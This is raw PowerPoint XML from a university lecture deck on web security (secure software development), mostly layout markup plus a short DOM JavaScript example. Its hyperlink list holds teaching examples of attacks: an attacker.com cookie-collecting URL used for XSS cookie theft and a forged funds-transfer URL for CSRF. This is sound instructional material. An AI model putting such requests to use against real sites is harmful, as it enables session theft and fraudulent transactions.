              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>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Char char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-342900" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="18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55600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-342900" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="18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0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55600" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-342900" lvl="1" marL="914400">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1800">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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>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a.com/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.a.com/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://a.com/index.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.a.com:8080/index.html" TargetMode="External"/><Relationship Id="rId7"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s155.stanford.edu/lectures/08-web.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=chkFBigodIw" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Projec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owasp.org/index.php/Category:OWASP_Top_Ten_Projec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example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii"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owasp.org/images/6/67/OWASPApplicationSecurityVerificationStandard3.0.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example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcc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www.attacker.com/cgi-bin/cookie.cgi?foo=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://excess-xss.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ww.handsonsecurity.net/question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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.csrflabelgg.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.csrflabattacker.com" TargetMode="External"/><Relationship Id="rId5"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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.csrflabattacker.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.csrflabelgg.com/action/profile/edit" TargetMode="External"/><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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><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6.xml"/><Relationship Id="rId3"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7.xml"/><Relationship Id="rId3"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 Id="rId3"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exame.com/search?input=word" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/search?input=" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.co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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.csrflabelgg.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId4"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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CS763 Secure Software Development </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;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5200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Yuting Zhang</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BU CSMET</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6"/>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(Document Object Model)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p36"/>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solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Platform and language neutral API to dynamically access and modify HTML/XML documents. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Object-oriented structured representation of the document</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> paragraphs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="A67F59"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>"P"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="708090"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// paragraphs[0] is the first &lt;p&gt; element</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="708090"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// paragraphs[1] is the second &lt;p&gt; element, etc.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>paragraphs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="4D4E53"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nodeName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>onload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="A67F59"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
